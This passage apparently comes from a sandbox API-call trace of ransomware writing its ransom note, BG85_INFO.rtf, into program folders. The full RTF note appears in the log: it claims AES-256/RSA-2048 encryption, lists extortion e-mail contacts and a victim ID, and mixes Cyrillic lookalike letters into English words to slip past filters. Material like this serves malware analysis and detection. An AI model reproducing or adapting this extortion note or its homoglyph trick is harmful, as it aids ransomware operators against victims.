r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.548] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.549] CloseHandle (hObject=0x1fc) returned 1 [0064.549] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\bg85_info.rtf")) returned 0xffffffff [0064.549] GetLastError () returned 0x2 [0064.549] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.550] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d 